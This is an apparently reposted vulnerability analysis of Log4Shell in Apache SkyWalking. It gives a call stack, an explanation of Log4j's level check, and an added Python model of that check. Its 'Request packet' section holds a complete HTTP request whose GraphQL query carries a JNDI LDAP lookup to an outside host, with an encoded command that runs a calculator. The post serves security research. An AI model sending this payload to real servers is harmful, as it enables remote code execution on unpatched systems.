Vulnerability Analysis | Apache Skywalking log4shell analysis

admin, 2025-04-15 09:53:26


0x01 Location of the trigger point

graphql.GraphQL#parseAndValidate
Call stack:

parseAndValidate:504, GraphQL (graphql)
lambda$parseValidateAndExecute$3:494, GraphQL (graphql)
apply:-1981677561 (graphql.GraphQL$$Lambda$140)
get:11, NoOpPreparsedDocumentProvider (graphql.execution.preparsed)
parseValidateAndExecute:490, GraphQL (graphql)
executeAsync:470, GraphQL (graphql)
execute:401, GraphQL (graphql)
execute:93, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:83, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:59, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:707, HttpServlet (javax.servlet.http)
service:107, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:790, HttpServlet (javax.servlet.http)
service:112, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
handle:763, ServletHolder (org.eclipse.jetty.servlet)
doHandle:551, ServletHandler (org.eclipse.jetty.servlet)
nextHandle:233, ScopedHandler (org.eclipse.jetty.server.handler)
doHandle:1363, ContextHandler (org.eclipse.jetty.server.handler)
nextScope:188, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:489, ServletHandler (org.eclipse.jetty.servlet)
nextScope:186, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:1278, ContextHandler (org.eclipse.jetty.server.handler)
handle:141, ScopedHandler (org.eclipse.jetty.server.handler)
handle:127, HandlerWrapper (org.eclipse.jetty.server.handler)
handle:500, Server (org.eclipse.jetty.server)
lambda$handle$1:383, HttpChannel (org.eclipse.jetty.server)
dispatch:-11312317880 (org.eclipse.jetty.server.HttpChannel$$Lambda$137)
dispatch:547, HttpChannel (org.eclipse.jetty.server)
handle:375, HttpChannel (org.eclipse.jetty.server)
onFillable:273, HttpConnection (org.eclipse.jetty.server)
succeeded:311, AbstractConnection$ReadCallback (org.eclipse.jetty.io)
fillable:103, FillInterest (org.eclipse.jetty.io)
run:117, ChannelEndPoint$2 (org.eclipse.jetty.io)
runTask:336, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)
doProduce:313, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)
tryProduce:171, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)
run:129, EatWhatYouKill (org.eclipse.jetty.util.thread.strategy)
run:375, ReservedThreadExecutor$ReservedThread (org.eclipse.jetty.util.thread)
runJob:806, QueuedThreadPool (org.eclipse.jetty.util.thread)
run:938, QueuedThreadPool$Runner (org.eclipse.jetty.util.thread)
run:745, Thread (java.lang)
0x02 Why only this point can trigger it
The org.apache.logging.log4j.spi.AbstractLogger#logIfEnabled method checks the log level before logging, and only the point above logs with log.warn.
The other points use LOGGER.debug. When execution reaches org.apache.logging.log4j.core.Logger.PrivateConfig#filter, the configuration file requires the INFO level (intLevel 400), while the level passed in is DEBUG (intLevel 500); since 400 is less than 500, the method returns false.
So org.apache.logging.log4j.spi.AbstractLogger#logIfEnabled never proceeds into org.apache.logging.log4j.spi.AbstractLogger#logMessage for those points.
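The level gate described above, modelled as an added example (Python written for this page, not code from the post, SkyWalking or Log4j): it mirrors the intLevel comparison in Logger.PrivateConfig#filter and uses it to audit which of the post's call sites would let a ${jndi:...} lookup in the GraphQL query reach message substitution. The intLevel values are Log4j 2's standard ones; the call-site names other than parseAndValidate, the request body, the LDAP host and the assumption that every call site echoes the query text are constructed.

```python
import json
import re

# Log4j 2 intLevel values (org.apache.logging.log4j.Level); a lower number is more severe.
LEVELS = {"OFF": 0, "FATAL": 100, "ERROR": 200, "WARN": 300,
          "INFO": 400, "DEBUG": 500, "TRACE": 600, "ALL": 2**31 - 1}

# Any Log4j 2 lookup expression such as ${jndi:ldap://host/path}; nested braces are
# deliberately not handled, which is enough for the request shown in the post.
LOOKUP_RE = re.compile(r"\$\{[^{}]*\}")


def is_enabled(configured: str, call_level: str) -> bool:
    """Mirror of Logger.PrivateConfig#filter: the call is logged only when the
    configured level's intLevel is >= the call-site level's intLevel."""
    return LEVELS[configured] >= LEVELS[call_level]


def find_lookups(text: str) -> list:
    """Lookup expressions in text, i.e. what Log4j would try to substitute."""
    return LOOKUP_RE.findall(text)


def exposed_call_sites(configured: str, call_sites: list, request_body: str) -> list:
    """Names of the call sites at which a lookup in the request's GraphQL query
    passes the level gate and gets substituted; call_sites holds
    (name, level, echoes_query) tuples."""
    query = json.loads(request_body).get("query", "")
    if not find_lookups(query):
        return []
    return [name for name, level, echoes_query in call_sites
            if echoes_query and is_enabled(configured, level)]


# Constructed request body in the shape of the post's packet (placeholder LDAP host).
REQUEST_BODY = json.dumps({
    "query": "query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) "
             "{total logs {serviceId ${jndi:ldap://ldap.example.invalid:1389/x} content}}}",
    "variables": {"condition": {"metricName": "test", "state": "ALL", "paging": {"pageSize": 10}}},
})

# The call sites as the post contrasts them: the parse failure is logged with log.warn, the
# others with LOGGER.debug (their names and the assumption that all echo the query are ours).
CALL_SITES = [
    ("graphql.GraphQL#parseAndValidate", "WARN", True),
    ("LOGGER.debug call site A", "DEBUG", True),
    ("LOGGER.debug call site B", "DEBUG", True),
]

if __name__ == "__main__":
    print(exposed_call_sites("INFO", CALL_SITES, REQUEST_BODY))   # logger at INFO, as in the post
    print(exposed_call_sites("DEBUG", CALL_SITES, REQUEST_BODY))  # the same sites configured at DEBUG
```

Running it with the logger at INFO lists only the log.warn call site; lowering the configured level to DEBUG would expose the LOGGER.debug points as well, which is the practical reason the root level matters here.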
0x03 Request packet
POST /graphql HTTP/1.1
Host: 127.0.0.1:12800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 444
Origin: http://x.x.x.x:8059
DNT: 1
Connection: close
Referer: http://x.x.x.x:8059/

{"query":"query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {total logs {serviceId ${jndi:ldap://192.168.22.33:1389/basic/base64/b3BlbiAtYSBDYWxjdWxhdG9yCg==} serviceName isError content}}}","variables":{"condition":{"metricName":"test","state":"ALL","paging":{"pageSize":10}}}}

END

Originally published on the WeChat public account 杂七杂八聊安全: Vulnerability Analysis | Apache Skywalking log4shell analysis

Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided solely for security research and teaching; readers who use this information for any other purpose bear all legal and joint liability, and this site bears none. For questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not blocked; contact details are on the home page).
Please keep this link when reposting (CN-SEC 中文网, with thanks to the original author): https://cn-sec.com/archives/3957182.html
